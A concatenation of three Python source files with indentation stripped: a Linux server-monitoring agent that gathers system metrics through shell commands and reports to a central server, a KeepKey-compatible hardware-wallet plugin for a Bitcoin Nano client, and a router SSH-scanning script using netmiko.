result = os.popen('iostat -x -m 1 2').readlines()
logger.debug(f'The result of Disks are: {result}')
if self.nic:
bps2 = os.popen(f'cat /proc/net/dev |grep {self.nic}').readlines()
logger.debug(f'The result of speed for the second time is: {bps2}')
result = result[len(result) // 2 - 1:]
disk_res = [line.strip() for line in result if len(line) > 5]
for i in range(len(disk_res)):
if 'avg-cpu' in disk_res[i]:
cpu_res = disk_res[i+1].strip().split() # Free CPU
cpu = 100 - float(cpu_res[-1]) # CPU usage
iowait = float(cpu_res[-3])
usr_cpu = float(cpu_res[0])
logger.debug(f'System CPU usage rate is: {cpu}%')
continue
if 'Device' in disk_res[i]:
for j in range(i+1, len(disk_res)):
disk_line = disk_res[j].split()
disk_num = disk_line[0].replace('-', '')
disk.update({disk_num: float(disk_line[-1])}) # IO
disk_r.update({disk_num + '_r': float(disk_line[2])}) # Read MB/s
disk_w.update({disk_num + '_w': float(disk_line[8])}) # Write MB/s
disk_d.update({disk_num + '_d': float(disk_line[14])}) # MB/s
logger.debug(f'The result of disks are: IO: {disk}, Read: {disk_r}, Write: {disk_w}')
break
mem, mem_available = self.get_free_memory()
if bps1 and bps2:
data1 = bps1[0].split()
data2 = bps2[0].split()
rece = (int(data2[1]) - int(data1[1])) / 1048576
trans = (int(data2[9]) - int(data1[9])) / 1048576
# 400 = 8 * 100 / 2
# Why multiply by 8, because 1MB/s = 8Mb/s.
# Why divided by 2, because the network card is in full duplex mode.
network = 400 * (rece + trans) / self.network_speed
logger.debug(f'The bandwidth of ethernet is: Receive {rece}MB/s, Transmit {trans}MB/s, Ratio {network}%')
tcp, Retrans = self.get_tcp()
return {'disk': disk, 'disk_r': disk_r, 'disk_w': disk_w, 'disk_d': disk_d, 'cpu': cpu, 'iowait': iowait,
'usr_cpu': usr_cpu, 'mem': mem, 'mem_available': mem_available, 'rece': rece, 'trans': trans,
'network': network, 'tcp': tcp, 'retrans': Retrans}
@staticmethod
def get_free_memory():
"""
Get system memory
:return: free Memory, available Memory
"""
mem, mem_available = 0, 0
result = os.popen('cat /proc/meminfo').readlines()
logger.debug(f'The free memory is: {result}')
for res in result:
if 'MemFree' in res:
mem = int(res.split(':')[-1].split('k')[0].strip()) / 1048576 # 1048576 = 1024 * 1024
continue
if 'MemAvailable' in res:
mem_available = int(res.split(':')[-1].split('k')[0].strip()) / 1048576 # 1048576 = 1024 * 1024
continue
if mem and mem_available:
break
return mem, mem_available
'''def get_handle(pid):
"""
Get the number of handles occupied by the process
:param pid: pid
:return: the number of handles
"""
result = os.popen("lsof -n | awk '{print $2}'| sort | uniq -c | sort -nr | " + "grep {}".format(pid)).readlines()
res = result[0].strip().split(' ')
logger.debug(res)
handles = None
if str(pid) in res:
handles = int(res[0])
return handles'''
@handle_exception(is_return=True, default_value=(0, 0))
def get_tcp(self):
"""
Get the number of TCP and calculate the retransmission rate
:return:
"""
tcp = 0
Retrans = 0
if self.isTCP:
result = os.popen('cat /proc/net/snmp |grep Tcp').readlines()
tcps = result[-1].split()
logger.debug(f'The TCP is: {tcps}')
tcp = int(tcps[9]) # TCP connections
Retrans = int(tcps[-4]) - self.Retrans_num
self.Retrans_num = int(tcps[-4])
return tcp, Retrans
@handle_exception(is_return=True, default_value={})
def get_port_tcp(self, port):
"""
Get the number of TCP connections for the port
:param port: port
:return:
"""
tcp_num = {}
res = os.popen(f'netstat -ant |grep {port}').read()
tcp_num.update({'tcp': res.count('tcp')})
tcp_num.update({'established': res.count('ESTABLISHED')})
tcp_num.update({'close_wait': res.count('CLOSE_WAIT')})
tcp_num.update({'time_wait': res.count('TIME_WAIT')})
return tcp_num
def get_cpu_cores(self):
"""
Get CPU information
:return:
"""
cpu_model = None
cpu_num = 0
cpu_core = 0
try:
result = os.popen('cat /proc/cpuinfo | grep "model name" |uniq').readlines()[0]
cpu_model = result.strip().split(':')[1].strip()
logger.info(f'The CPU model is {cpu_model}')
except Exception as err:
logger.error('The CPU model is not found.')
logger.error(err)
try:
result = os.popen('cat /proc/cpuinfo | grep "physical id" | uniq | wc -l').readlines()[0]
cpu_num = int(result)
logger.info(f'The number of CPU is {cpu_num}')
except Exception as err:
logger.error('The number of CPU is not found.')
logger.error(err)
try:
result = os.popen('cat /proc/cpuinfo | grep "cpu cores" | uniq').readlines()[0]
cpu_core = int(result.strip().split(':')[1].strip())
logger.info(f'The number of cores per CPU is {cpu_core}')
except Exception as err:
logger.error('The number of cores per CPU is not found.')
logger.error(err)
result = os.popen('cat /proc/cpuinfo| grep "processor"| wc -l').readlines()[0]
self.cpu_cores = int(result)
logger.info(f'The number of cores all CPU is {self.cpu_cores}')
if cpu_model and cpu_num and cpu_core:
self.cpu_info = f'{cpu_num} CPU(s), {cpu_core} core(s) pre CPU, total {self.cpu_cores} cores, ' \
f'CPU model is {cpu_model} '
elif cpu_model:
self.cpu_info = f'total CPU cores is {self.cpu_cores}, CPU model is {cpu_model} '
else:
self.cpu_info = f'total CPU cores is {self.cpu_cores}'
@handle_exception(is_return=True)
def get_total_mem(self):
"""
Get Memory
:return:
"""
result = os.popen('cat /proc/meminfo| grep "MemTotal"').readlines()[0]
self.total_mem = float(result.split(':')[-1].split('k')[0].strip()) / 1048576 # 1048576 = 1024 * 1024
self.total_mem_100 = self.total_mem / 100
logger.info(f'The total memory is {self.total_mem}G')
@handle_exception()
def get_disks(self):
"""
Get all disks number.
:return:
"""
result = os.popen('iostat -x -k').readlines()
if result:
disk_res = [line.strip() for line in result if len(line) > 5]
for i in range(len(disk_res)):
if 'Device' in disk_res[i]:
for j in range(i + 1, len(disk_res)):
disk_line = disk_res[j].split()
self.all_disk.append(disk_line[0])
logger.info(f'The system has {len(self.all_disk)} disks, disk number is {"、".join(self.all_disk)}')
else:
raise Exception('The system does not support the iostat, please install sysstat. ')
@handle_exception(is_return=True)
def get_system_nic(self):
"""
Get network card.
Only one network card can be got. If the system uses multiple network cards, only the first one can
be got. Use "cat /proc/net/dev" to view the order of the network cards.
:return:
"""
network_card = []
result = os.popen('cat /proc/net/dev').readlines() # get network data
logger.debug(f'The result for the first time is: {result}')
time.sleep(1)
result1 = os.popen('cat /proc/net/dev').readlines() # get network data again
logger.debug(f'The result for the second time is: {result1}')
for i in range(len(result)):
if ':' in result[i]:
data = result[i].split()
data1 = result1[i].split()
if data[0] == data1[0]:
logger.debug(f'The first data change is {data}')
logger.debug(f'The second data change is {data1}')
if data[1] != data1[1] or data[9] != data1[9]: # If the data of network card changes, it means that the card is in use.
network_card.append(data[0].strip(':'))
logger.debug(f'The data of network card is {network_card}')
if 'lo' in network_card: # 'lo' is 127.0.0.1, need to be deleted.
network_card.pop(network_card.index('lo'))
if len(network_card) > 0:
self.nic = network_card[0]
logger.info(f'The network card in use is {self.nic}')
else:
logger.error('The network card in use is not found.')
@handle_exception(is_return=True)
def get_total_disk_size(self):
"""
Get disk size
:return:
"""
result = os.popen('df -m').readlines()
logger.debug(f'The data of disk is {result}')
for line in result:
res = line.split()
if '/dev/' in res[0]:
size = float(res[1])
self.total_disk += size
logger.debug(f'The disks total size is {self.total_disk}M')
self.total_disk_h = self.total_disk / 1024
if self.total_disk_h > 1024:
total = round(self.total_disk_h / 1024, 2)
self.total_disk_h = f'{total}T'
else:
total = round(self.total_disk_h, 2)
self.total_disk_h = f'{total}G'
logger.info(f'The total size of disks is {self.total_disk_h}')
@handle_exception(is_return=True, default_value=0)
def get_used_disk_rate(self):
"""
Get disks usage
:return:
"""
used_disk_size = 0
result = os.popen('df -m').readlines()
logger.debug(f'The data of disk is {result}')
for line in result:
res = line.split()
if '/dev/' in res[0]:
size = float(res[2])
used_disk_size += size
logger.info(f'The used size of disks is {used_disk_size}M')
return used_disk_size / self.total_disk
@handle_exception(is_return=True)
def get_system_net_speed(self):
"""
Get bandwidth, Mbs
:return:
"""
if self.nic:
result = os.popen(f'ethtool {self.nic}').readlines()
logger.debug(f'The bandwidth is {result}')
for line in result:
if 'Speed' in line:
logger.debug(f'The bandwidth is {line}')
res = re.findall(r"(\d+)", line)
speed = int(res[0])
if 'G' in line:
speed = speed * 1024
if 'K' in line:
speed = speed / 1024
self.network_speed = speed
break
logger.info(f'The bandwidth of ethernet is {self.network_speed}Mb/s')
@handle_exception(is_return=True)
def get_system_version(self):
"""
Get system version
:return:
"""
try:
result = os.popen('cat /etc/redhat-release').readlines() # system release version
logger.debug(f'The system release version is {result}')
self.system_version = result[0].strip()
except Exception as err:
logger.warning(err)
result = os.popen('cat /proc/version').readlines()[0] # system kernel version
logger.debug(f'The system kernel version is{result}')
res = re.findall(r"gcc.*\((.*?)\).*GCC", result.strip())
if res:
self.system_version = res[0]
else:
res = re.findall(r"gcc.*\((.*?)\)", result.strip())
self.system_version = res[0]
logger.info(f'system release/kernel version is {self.system_version}')
@handle_exception(is_return=True, default_value=0)
def get_RetransSegs(self):
"""
Get the number of TCP RetransSegs
:return:
"""
Retrans = 0
if self.isTCP:
result = os.popen('cat /proc/net/snmp |grep Tcp').readlines()
tcps = result[-1].split()
logger.debug(f'The TCP is: {tcps}')
Retrans = int(tcps[-4])
return Retrans
def is_java_server(self, port):
"""
Determine whether the port is java service
:param port: port
"""
pid = port_to_pid(port)
try:
result = os.popen(f'jstat -gc {pid} |tr -s " "').readlines()[1]
res = result.strip().split(' ')
logger.info(f'The JVM of {pid} is {res}')
_ = float(res[2]) + float(res[3]) + float(res[5]) + float(res[7])
self.is_java.update({str(port): 1})
except Exception as err:
logger.warning(err)
self.is_java.update({str(port): 0})
def check_sysstat_version(self):
"""
Check sysstat version
"""
try:
version = os.popen("iostat -V |grep ysstat |awk '{print $3}' |awk -F '.' '{print $1}'").readlines()[0]
v = int(version.strip())
if v < 12:
msg = 'The iostat version is too low, please upgrade to version 12+, download link: ' \
'http://sebastien.godard.pagesperso-orange.fr/download.html'
logger.error(msg)
raise Exception(msg)
except IndexError:
logger.error(traceback.format_exc())
msg = 'Please install or upgrade sysstat to version 12+, download link: ' \
'http://sebastien.godard.pagesperso-orange.fr/download.html'
logger.error(msg)
raise Exception(msg)
try:
version = os.popen("pidstat -V |grep ysstat |awk '{print $3}' |awk -F '.' '{print $1}'").readlines()[0]
v = int(version.strip())
if v < 12:
msg = 'The pidstat version is too low, please upgrade to version 12+, download link: ' \
'http://sebastien.godard.pagesperso-orange.fr/download.html'
logger.error(msg)
raise Exception(msg)
except IndexError:
logger.error(traceback.format_exc())
msg = 'Please install or upgrade sysstat to version 12+, download link: ' \
'http://sebastien.godard.pagesperso-orange.fr/download.html'
logger.error(msg)
raise Exception(msg)
@handle_exception(is_return=True)
def clear_port(self):
"""
Clean up ports that have been stopped monitoring
:return:
"""
stop_num = self._msg['isRun'].count(0)
if stop_num > 0:
port_list = copy.deepcopy(self._msg)
# stop all monitoring
for ind in range(len(self._msg['port'])):
if self._msg['isRun'][ind] > 0:
self._msg['isRun'][ind] = 0
self.FGC = {} # reset FGC times
self.FGC_time = {} # reset FGC time
self.is_java = {}
time.sleep(self.port_interval + 5) # Wait for all ports to stop monitoring
self._msg = {'port': [], 'pid': [], 'isRun': [], 'startTime': []}
# Start monitoring again
for ind in range(len(port_list['port'])):
if port_list['isRun'][ind] > 0:
self.start = {'port': port_list['port'][ind], 'pid': port_list['pid'][ind], 'is_run': 1}
del port_list
logger.info('Successfully clean up the ports that stopped monitoring.')
else:
logger.info('There is no port that stoped monitoring.')
def register_agent(self, disk_flag=True):
"""
Timed task. One is register, the other one is clean up the ports that stopped monitoring.
disk_flag: Whether to send email when disk space usage is too high.
:param
:return:
"""
url = f'http://{cfg.getServer("address")}/Register'
header = {
"Accept": "application/json, text/plain, */*",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json; charset=UTF-8"}
post_data = {
'host': self.IP,
'port': cfg.getAgent('port'),
'system': self.system_version,
'cpu': self.cpu_cores,
'cpu_usage': self.cpu_usage,
'nic': self.nic,
'network_speed': self.network_speed,
'mem': round(self.total_mem, 2),
'mem_usage': self.mem_usage,
'disk_size': self.total_disk_h,
'disk_usage': self.get_used_disk_rate(),
'disks': ','.join(self.all_disk)
}
start_time = time.time()
disk_start_time = time.time()
while True:
try:
if time.time() - start_time > 8: # register
post_data['cpu_usage'] = self.cpu_usage
post_data['mem_usage'] = self.mem_usage
res = requests.post(url=url, json=post_data, headers=header)
logger.info(f"The result of registration is {res.content.decode('unicode_escape')}")
start_time = time.time()
if time.strftime('%H:%M') == self.timeSetting: # clean up
logger.debug('Cleaning up the ports that stopped monitoring.')
self.clear_port()
if time.time() - disk_start_time > 300:
disk_usage = self.get_used_disk_rate()
if disk_usage:
post_data['disk_usage'] = disk_usage # disk space usage, without %
disk_start_time = time.time()
if self.maxDiskUsage < disk_usage:
msg = f"The disk space usage is {disk_usage/100:.2f}%, it is too high. Server IP is {self.IP}"
logger.warning(msg)
if self.isDiskAlert and disk_flag:
disk_flag = False # Set to False to prevent cleaning up cache continuously
thread = threading.Thread(target=notification, args=(msg,))
thread.start()
else:
disk_flag = True
time.sleep(5)
except(Exception):
logger.error(traceback.format_exc())
time.sleep(1)
def clear_cache(self):
"""
Cleaning up cache.
:return:
"""
logger.info(f'Start Cleaning up cache: echo {self.echo} > /proc/sys/vm/drop_caches')
os.popen(f'echo {self.echo} > /proc/sys/vm/drop_caches')
logger.info('Clear the cache successfully.')
def __del__(self):
pass
@handle_exception(is_return=True)
def port_to_pid(port):
"""
Get pid based on port
:param port: port
:return: pid
"""
pid = None
result = os.popen(f'netstat -nlp|grep {port}').readlines()
logger.debug(f'The result of the port {port} is {result}')
flag = f':{port}'
res = [line.strip() for line in result if flag in line]
logger.debug(res[0])
p = res[0].split()
pp = p[3].split(':')[-1]
if str(port) == pp:
pid = p[p.index('LISTEN') + 1].split('/')[0]
logger.info(f'The pid of the port {port} is {pid}.')
return pid
@handle_exception(is_return=True)
def notification(msg):
"""
Send email.
:param msg: Email body
:return:
"""
url = f'http://{cfg.getServer("address")}/Notification'
header = {
"Accept": "application/json, text/plain, */*",
"Accept-Encoding": "gzip, deflate",
"Content-Type": "application/json; charset=UTF-8"}
post_data = {
'host': get_ip(),
'msg': msg
}
logger.debug(f'The content of the email is {msg}')
res = requests.post(url=url, json=post_data, headers=header)
if res.status_code == 200:
response = json.loads(res.content.decode())
if response['code'] == 0:
logger.info('Send email successfully.')
else:
logger.error(response['msg'])
else:
logger.error('Failed to send mail.')
|
plugin.py | import threading
from binascii import hexlify, unhexlify
from bitcoinnano.util import bfh, bh2u
from bitcoinnano.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT, NetworkConstants)
from bitcoinnano.i18n import _
from bitcoinnano.plugins import BasePlugin
from bitcoinnano.transaction import deserialize
from bitcoinnano.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class KeepKeyCompatibleKeyStore(Hardware_KeyStore):
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by %s') % self.device)
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class KeepKeyCompatiblePlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.main_thread = threading.current_thread()
# FIXME: move to base class when Ledger is fixed
if self.libraries_available:
self.device_manager().register_devices(self.DEVICE_IDS)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
if device.interface_number == 1:
pair = [None, device.path]
else:
pair = [device.path, None]
try:
return self.hid_transport(pair)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def _try_bridge(self, device):
self.print_error("Trying to connect over Trezor Bridge...")
try:
return self.bridge_transport({'path': hexlify(device.path)})
except BaseException as e:
self.print_error("cannot connect to bridge", str(e))
return None
def create_client(self, device, handler):
# disable bridge because it seems to never returns if keepkey is plugged
#transport = self._try_bridge(device) or self._try_hid(device)
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated %s firmware for device labelled %s. Please '
'download the updated firmware from %s') %
(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if NetworkConstants.TESTNET else "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your %s.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your %s, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
) % (self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target = self._initialize_device, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
wizard.loop.exec_()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
wizard.loop.exit(0)
def setup_device(self, device_info, wizard):
'''Called when creating a new wallet. Select the device to use. If
the device is uninitialized, go through the intialization
process.'''
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = bh2u(signed_tx)
tx.update_signatures(raw)
def show_address(self, wallet, address):
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
wallet.keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
script_type = self.types.SPENDADDRESS
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
txinputtype.script_type = self.types.SPENDADDRESS
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = map(f, x_pubkeys)
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures')),
m=txin.get('num_sig'),
)
script_type = self.types.SPENDMULTISIG
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype.address_n.extend(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if 'scriptSig' in txin:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
outputs = []
has_change = False
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None and not has_change:
has_change = True # no more than one change address
addrtype, hash_160 = b58_address_to_hash160(address)
index, xpubs, m = info
if len(xpubs) == 1:
script_type = self.types.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index)
txoutputtype = self.types.TxOutputType(
amount = amount,
script_type = script_type,
address_n = address_n,
)
else:
script_type = self.types.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d"%index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [ self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys = pubkeys,
signatures = [b''] * len(pubkeys),
m = m)
txoutputtype = self.types.TxOutputType(
multisig = multisig,
amount = amount,
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index),
script_type = script_type)
else:
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
addrtype, hash_160 = b58_address_to_hash160(address)
if addrtype == NetworkConstants.ADDRTYPE_P2PKH:
txoutputtype.script_type = self.types.PAYTOADDRESS
elif addrtype == NetworkConstants.ADDRTYPE_P2SH:
txoutputtype.script_type = self.types.PAYTOSCRIPTHASH
else:
raise BaseException('addrtype: ' + str(addrtype))
txoutputtype.address = address
outputs.append(txoutputtype)
return outputs
def bitcoinnano_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t.inputs.extend(inputs)
for vout in d['outputs']:
o = t.bin_outputs.add()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the trezor libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.bitcoinnano_tx_to_txtype(tx)
|
module_scan.py | #!/usr/bin/env python3
from detecta import *
from ssh_connect import *
import os
import re
import netifaces as ni
import json
from threading import Thread
from netmiko import ConnectHandler
re_n={}
routers= {}
known_routers = []
threads= []
routers_Code= {}
routers_alreadyConfigured= []
amountOfRouters= 0
# Prototipo de conexión a router cisco
cisco={
"device_type":"cisco_xe",
"ip":"",
"username":"",
"password":"",
"secret":""
}
class dataToRouter:
def __init__(self, ip_direct, previousRouter, hostname, net_connect):
self.ip_direct= ip_direct
self.hostname= hostname
self.previousRouter= previousRouter
self.direcciones= []
self.interfaces= []
self.it= {}
self.net_connect= net_connect
def set_data(self, k, cmd, rawCmdInstructions, willUsePredefinedConnection):
self.k= k
self.cmd= cmd
self.rawCmdInstructions= rawCmdInstructions
self.willUsePredefinedConnection= willUsePredefinedConnection
def sendDataToRouter(self):
# Hace la conexión puentada de un Router a otro router
print(f"Realizando conexión bridge entre {self.k} y {self.ip_direct}")
self.cmd[0]= f"ssh -l admin {self.ip_direct}"
#print('Intentará crear la conexión con: ', cisco, ' primer instruccion: ', self.cmd[0])
if self.willUsePredefinedConnection:
self.net_connect= self.net_connect
else:
self.net_connect= ConnectHandler(**cisco)
#net_connect = ConnectHandler(**cisco)
#print('Se hizo la conexión')
#net_connect.enable()
self.cmd[0]= f"ssh -l admin {self.ip_direct}"
print('Conexión hecha con ', self.hostname, ' con comando ', self.cmd[0])
routers_Code[self.hostname]= []
routers_Code[self.hostname].append(self.net_connect.send_command(self.cmd[0], expect_string=r'Password:'))
tempVar= self.hostname.split('.')
print(f'Valor recibido actualmente en {self.hostname} es {routers_Code[self.hostname][0]}')
print('Espera conexión con: ', tempVar[0], ' con la clave: ', self.cmd[1], ' esperando a ', self.hostname.split('.')[0]+'#')
routers_Code[self.hostname].append(self.net_connect.send_command(self.cmd[1], expect_string=r''+self.hostname.split('.')[0]+'#'))
print(f'Espera ejecutar...1 en {self.hostname}')
routers_Code[self.hostname].append(self.net_connect.send_command(self.cmd[2]))
print(f'Espera ejecutar...2 en {self.hostname}')
routers_Code[self.hostname].append(self.net_connect.send_command(self.cmd[3]))
#self.output.append(self.net_connect.send_command(self.cmd[1], expect_string=r''+self.hostname.split('.')[0]+'#'))
#self.output.append(self.net_connect.send_command(self.cmd[2]))
#self.output.append(self.net_connect.send_command(self.cmd[3]))
print(f'Dentro del OUTPUT de {self.hostname}: {routers_Code[self.hostname]}')
routers[self.hostname]['Ip']= self.ip_direct
threadsInner= []
for key, values in routers[self.hostname]['Neighbors'].items():
if key not in routers_alreadyConfigured:
print(f'Elemento aceptado dentro de {self.hostname}: ', values)
routers_alreadyConfigured.append(key)
#global amountOfRouters
#amountOfRouters= amountOfRouters + 1
router= dataToRouter(values, self.hostname, key, ConnectHandler(**cisco))
router.set_data(self.ip_direct, self.rawCmdInstructions, self.rawCmdInstructions, False)
#global threads
#threads.append(Thread(target=process,args=(router,)))
#threads[-1].start()
threadsInner.append(Thread(target=process,args=(router,)))
threadsInner[-1].start()
#threadsInner[-1].join()
#else:
#routers[self.hostname]['Neighbors'][key]= self.k
for t in range(len(threadsInner)):
threadsInner[t].join()
self.cmd= self.cmd
#print(f'El router {self.hostname} tendrá comandos especiales? {self.willUsePredefinedConnection}')
if self.willUsePredefinedConnection is False:
routers_Code[self.hostname].append(self.net_connect.send_command_timing(self.cmd[4]))
#for i in range(len(self.cmd)):
#print(f'Comando a anotar del router {self.hostname}: ', self.cmd[i])
#routers_Code[self.hostname].append(self.net_connect.send_command_timing(self.cmd[i]))
#self.output.append(self.net_connect.send_command(self.cmd[i]))
else:
routers_Code[self.hostname].append(self.net_connect.send_command(self.cmd[4]))
print(f'Comandos a revisar: {self.cmd}')
for i in range(5, len(self.cmd)):
print(f'Comando a anotar del router {self.hostname}: ', self.cmd[i])
routers_Code[self.hostname].append(self.net_connect.send_command_timing(self.cmd[i]))
#self.output.append(self.net_connect.send_command(self.cmd[i]))
print(f'\n\nOUTPUT Router {self.hostname}: ', routers_Code[self.hostname])
#output=conectar_bridge(cisco,self.cmd)
"""
# Se obtienen sus datos como tabla de enrutamiento para realizar las configuraciones más tarde
host=re.split("#|\n| ",self.output[-2])[1]
dir=re.split("\n| YES NVRAM up up | YES manual up up | ",self.output[-3])
inte=re.split("\n| Internet address is | ",self.output[-4])
sub_n=[]
self.interfaces= []
self.direcciones= []
for i in range(len(dir)):
if ""!=dir[i] and "R" not in dir[i]:
self.direcciones.append(dir[i])
for i in range(len(inte)):
if ""!=inte[i] and "R" not in inte[i]:
self.interfaces.append(inte[i])
sub=inte[i].split("/")
pr=sub[1]
sub=list(map(int,sub[0].split(".")))
sub=arr_to_ip(get_id_net(sub,create_masc_by_prefix(int(pr))))
sub_n.append(sub)
self.it= self.it
for i in range(int(len(self.direcciones)/2)):
self.it[self.direcciones[i*2]]=self.interfaces[i]
self.it[f"{self.direcciones[i*2]}-sub"]=sub_n[i]
global re_n
re_n[host]=self.it
return self.it
"""
#Insertará las interfaces de cada router
listToStr= ' '.join(map(str, routers_Code[self.hostname]))
